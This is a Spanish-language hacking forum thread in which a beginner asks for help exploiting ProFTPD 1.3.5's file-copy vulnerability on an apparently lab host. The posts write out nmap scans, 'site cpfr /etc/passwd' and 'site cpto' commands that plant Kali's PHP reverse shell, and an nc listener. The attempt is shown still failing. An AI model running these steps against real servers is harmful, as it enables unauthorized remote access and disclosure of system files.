elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  proftpd 1.3.5
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: proftpd 1.3.5  (Leído 3,407 veces)
Panic0

Desconectado Desconectado

Mensajes: 218



Ver Perfil
proftpd 1.3.5
« en: 21 Enero 2022, 05:43 am »

Hola, resulta que hace rato estoy tratando de explotar el servicio proftpd 1.3.5, pero, sin usar metasploit...Logro hacer todo bien.

Analizo puertos con nmap
Código:
sudo nmap -p- -sS --open -vvv -sV -Pn 192.168.1.2

Lanzo un script sobre el puerto 21 (ftp)
Código:
]sudo nmap -p21 -sV192.168.1.2 --script "vuln"

(Me dice que es vulnerable a remote command execution)




Me conecto al ftp
Código:
ftp 192.168.1.12 21


Y aqui, trato de enviar una reverse shell al servidor.
Código:
ftp SITE CPFR (path de la reverse)
Pero me sale
Código:
503 Bad sequence of commands.

Me quede estancado en ese paso, si alguien tiene alguna idea de que puedo hacer o algo,es bienvenida.


Gracias!!

Soy nuevo en esto, no se si estoy cometiendo un error muy basico o algo similiar!


En línea

Los ataques de pánico suelen comenzar de forma súbita, sin advertencia.
BloodSharp


Desconectado Desconectado

Mensajes: 812


¡ Hiperfoco !


Ver Perfil WWW
Re: proftpd 1.3.5
« Respuesta #1 en: 21 Enero 2022, 14:55 pm »

Y aqui, trato de enviar una reverse shell al servidor.
Código:
ftp SITE CPFR (path de la reverse)
Pero me sale
Código:
503 Bad sequence of commands.

Según varios scripts de la exploitdb tenés que sacarle la palabra ftp al comando, ya que no es utilizada:

Ejemplo:
Código:
site cpfr /etc/passwd

Exploits de referencia tanto en python y metasploit con ruby


B#
En línea



Panic0

Desconectado Desconectado

Mensajes: 218



Ver Perfil
Re: proftpd 1.3.5
« Respuesta #2 en: 21 Enero 2022, 17:30 pm »

Según varios scripts de la exploitdb tenés que sacarle la palabra ftp al comando, ya que no es utilizada:

Ejemplo:
Código:
site cpfr /etc/passwd

Exploits de referencia tanto en python y metasploit con ruby


B#



Si lo se, pero aún así me sigue tirando error
En línea

Los ataques de pánico suelen comenzar de forma súbita, sin advertencia.
Danielㅤ


Desconectado Desconectado

Mensajes: 1.833


🔵🔵🔵🔵🔵🔵🔵


Ver Perfil
Re: proftpd 1.3.5
« Respuesta #3 en: 21 Enero 2022, 19:28 pm »

Hola, podrías dejarnos éste comando completo:

Código:
ftp SITE CPFR (path de la reverse)

así podamos ver como estás usando ese comando porque el error pareciera ser que tiene que ver con eso, ponlo tal cual lo estás usando.


Saludos
En línea

Panic0

Desconectado Desconectado

Mensajes: 218



Ver Perfil
Re: proftpd 1.3.5
« Respuesta #4 en: 21 Enero 2022, 23:56 pm »

Hola, podrías dejarnos éste comando completo:

Código:
ftp SITE CPFR (path de la reverse)

así podamos ver como estás usando ese comando porque el error pareciera ser que tiene que ver con eso, ponlo tal cual lo estás usando.


Saludos



Hola amigo, todo bien?

Logre solucionar ese problema, ahora tengo otro, resulta que cuando mando una reverse shell en php al server. Esta por algún motivo no funciona.

Lo que hice step by step.

De esta forma logro explotar esa vulnerabilidad
1)
Código:
ftp: site cpfr /etc/passwd

Abro el puerto escucha (el 4444, porque me gusta uu)
2)
Código:
nc –lvp 4444/code]


Copio una reverse shell genérica (Que trae por defecto kali)
3)  [code]ftp: site cpto /usr/share/webshells/php/php-reverse-shell.php
(Antes,claro que modifico la reverse shell)


4) Acá es donde fallo, en teoría la maquina victima me debería conectar al puerto de mi maquina. Pero no.



[/code]
En línea

Los ataques de pánico suelen comenzar de forma súbita, sin advertencia.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda con Configuración Proftpd
Dudas Generales
DarkItachi 2 5,555 Último mensaje 19 Abril 2011, 17:09 pm
por DarkItachi
ProFtpd
Redes
aldg 0 2,501 Último mensaje 31 Agosto 2011, 14:28 pm
por aldg
Cambio de puerto proftpd y Nat.
GNU/Linux
eb4enn 0 2,996 Último mensaje 19 Noviembre 2013, 21:26 pm
por eb4enn
Duda con Proftpd en Debian 6
GNU/Linux
PeGaSs0 2 2,747 Último mensaje 18 Febrero 2015, 01:35 am
por PeGaSs0
Problema con vulnerabilidad de ProFTPD 1.3.3c
Hacking
pocholo 1 2,892 Último mensaje 9 Abril 2023, 17:52 pm
por LlopoRobot
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines